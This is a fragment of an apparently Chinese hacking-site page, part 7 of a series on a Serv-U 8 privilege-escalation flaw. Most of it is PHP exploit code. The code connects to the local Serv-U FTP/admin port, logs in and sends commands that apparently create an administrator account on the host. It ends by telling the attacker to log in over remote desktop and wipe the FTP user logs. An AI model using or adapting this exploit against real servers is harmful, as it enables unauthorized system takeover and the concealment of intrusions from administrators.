发现serv-u8提权漏洞(7)
时间:2010-01-15 13:37来源:未知 作者:admin 点击:次
fputs($sock_exec, $sendbuf, strlen($sendbuf)); $recvbuf = fgets($sock_exec, 1024); $sendbuf = "PASS hahaha"; fputs($sock_exec, $sendbuf, strlen($sendbuf)); $recvbuf = fgets($sock_exec, 1024); $sendbuf
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS hahaha";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addUser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "执行".$exec_addUser."返回了$recvbuf";
fclose($sock_exec);
$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS hahaha";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addGroup."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "执行".$exec_addGroup."返回了$recvbuf";
fclose($sock_exec);
echo "好了,自己3389上去清理ftp用户日志吧!";
//exec-------------------------------
}
/** function createRequest
@port_post : administrator port $port=43958;
@host_post : host $host="127.0.0.1";
@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
@post_data_post : arraylist $post_data['user'] = "";...
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string="";
if ($post_data_post!="")
{
foreach($post_data_post as $key=>$value)
{
$values[]="$key=".urlencode($value);
}
$data_string=implode("",$values);
------分隔线----------------------------
